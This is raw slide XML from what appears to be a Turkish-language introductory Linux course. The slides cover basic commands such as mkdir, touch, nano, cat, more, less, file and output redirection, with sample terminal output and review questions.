              <a:t>cat /etc/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="170" name="Google Shape;170;p25"/>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cat /etc/pas</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171" name="Google Shape;171;p25"/>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&lt;TAB&gt; komutuna basıldığında komutun devamını tamamlar. Eğer birden fazla seçenek varsa ilgili seçenekleri listeler.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Örnekler:</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~/Do</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cd ~/Dow</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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152275" y="-47725"/>
            <a:ext cx="7848300" cy="56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Dersin kaynak kitapları</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="Google Shape;38;p8"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4586350" y="622300"/>
            <a:ext cx="3194749" cy="4127025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="Google Shape;39;p8"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="816725" y="647375"/>
            <a:ext cx="3048049" cy="40768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 name="Shape 175"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176" name="Google Shape;176;p26"/>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Klasör oluşturma komutu: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mkdir </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="177" name="Google Shape;177;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="1657750"/>
            <a:ext cx="4115400" cy="29115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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="950">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>total 0</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Desktop/</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Documents/</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Downloads/</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yeni_dizin/</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178" name="Google Shape;178;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="679925"/>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mkdir yeni_dizin </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="179" name="Google Shape;179;p26"/>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komut, belirtilen isimde yeni bir dizin oluşturur.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Kullanım:</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mkdir parentdir/subdir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Soru:</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Aynı isimde benzer dosya varsa ne yapar?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180" name="Google Shape;180;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="1168838"/>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ls -alh</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4" name="Shape 184"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185" name="Google Shape;185;p2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oluşturma komutu: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>touch </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186" name="Google Shape;186;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="1641125"/>
            <a:ext cx="4115400" cy="2928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total 0</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Desktop/</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Documents/</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12:00 Downloads/</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drwxr-xr-x 2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4.0K Jan 8 12:0</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="950">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="950">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> yeni_dizin/</a:t>
            </a:r>
            <a:endParaRPr b="1"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b="1" lang="en-US" sz="950">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>-rw-r--r-- 1 john </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="950">
                <a:solidFill>
                  <a:srgbClr val="E9950C"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="950">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> 0 Jan 8 12:01 yeni_dosya.txt</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="187" name="Google Shape;187;p27"/>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komut, belirtilen isimde yeni bir dosya oluşturur.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Soru:</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Aynı isimde benzer dosya varsa ne yapar?</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Farklı bir dizin içinde dosya oluşturabilir miyim?</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Gizli dosya nasıl </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>oluşturulur</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188" name="Google Shape;188;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="679925"/>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touch yeni_dosya.txt</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189" name="Google Shape;189;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="1160513"/>
            <a:ext cx="4115400" cy="3759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00000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ ls -alh</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3" name="Shape 193"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="194" name="Google Shape;194;p2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Döküman editörleri: nano, vi, vim, emacs</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195" name="Google Shape;195;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="1217400"/>
            <a:ext cx="4115400" cy="3351600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="182875">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="196" name="Google Shape;196;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152275" y="679925"/>
            <a:ext cx="41346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nano yeni_dosya.txt</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="197" name="Google Shape;197;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152275" y="1217401"/>
            <a:ext cx="4115402" cy="3444605"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="198" name="Google Shape;198;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4425600" y="679925"/>
            <a:ext cx="4443876" cy="39820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2" name="Shape 202"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203" name="Google Shape;203;p2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içeriği görüntüleme komutu: cat</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204" name="Google Shape;204;p29"/>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-n .gizli_dosya.txt</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205" name="Google Shape;205;p29"/>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İlgili dosyanın içeriğini gösterir.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Eğer dosya çok büyükse bir seferde tüm içeriği gösterir.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Parametreleri:</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-n : Satırları </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>numaralandırmak</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> için kullanılır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Soru:</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Büyük boyutlu dosyaları okumak istediğimizde ne yapmamız gerekiyor?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206" name="Google Shape;206;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="1223625"/>
            <a:ext cx="4115400" cy="3345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1  Bu bir gizli dosyanın içeriğidir.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2  Herhangi bir metin ya da veri olabilir.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3  Bu satır numarasıyla birlikte gösteriliyor.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>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0" name="Shape 210"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="211" name="Google Shape;211;p30"/>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içeriği görüntüleme komutu: more ve less</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="212" name="Google Shape;212;p30"/>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more .gizli_dosya.txt</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="213" name="Google Shape;213;p30"/>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İlgili dosyanın içeriğini okur.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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>osyanın içeriğini ekranda daha kontrollü şekilde göstermek için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Dosya içeriğini sayfa sayfa gösterir ve kullanıcı, bir sayfa dolmadan önce daha fazla okuma yapmak veya dosyanın geri kalanını atlamak için tuşları kullanabilir.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Space tuşu bir sonraki sayfayı, Enter tuşu bir satır ilerletir, q tuşu ise çıkışı sağlar.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less, more’un gelişmiş versiyonu. Aynı zamanda sayfa içinde yukarı ve aşağı kaydırmaya, arama yapmaya, ve dosyanın farklı bölgelerine hızlıca gitmeye olanak tanır.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214" name="Google Shape;214;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="1248813"/>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less .gizli_dosya.txt</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="Google Shape;215;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="1773775"/>
            <a:ext cx="4115400" cy="27954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Bu bir gizli dosyanın içeriğidir.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Herhangi bir metin ya da veri olabilir.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Bu satır numarasıyla birlikte gösteriliyor.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a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>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9" name="Shape 219"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220" name="Google Shape;220;p3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İçerik ve çıktı yönlendirme komutu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: &gt;, &gt;&gt;, &lt;, |</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="Google Shape;221;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="679925"/>
            <a:ext cx="8769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.gizli_dosya.txt &gt; yeni_dosya.txt</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="222" name="Google Shape;222;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="2340725"/>
            <a:ext cx="8769900" cy="23637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cat dosya.txt &gt; yeni_dosya.txt </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Sol tarafındaki ifadenin ürettiği çıktıyı sağ tarafındaki dosyaya yönlendirir.</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Sol tarafındaki veriyi sağ tarafındaki komuta girdi olarak sunar.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&gt; üzerine yazar, &gt;&gt; sonuna ekler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cat &lt; yeni_dosya.txt</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Sağ taraftaki veriyi sol taraftaki komuta girdi olarak sunar.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="223" name="Google Shape;223;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="1233550"/>
            <a:ext cx="8769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.gizli_dosya.txt &gt;&gt; yeni_dosya.txt</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="224" name="Google Shape;224;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="1787175"/>
            <a:ext cx="8769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&lt; .gizli_dosya.txt</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8" name="Shape 228"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="229" name="Google Shape;229;p32"/>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tipini öğrenme komutu: file</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="Google Shape;230;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="1280200"/>
            <a:ext cx="4115400" cy="32889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chemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>belge1.txt: ASCII text</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
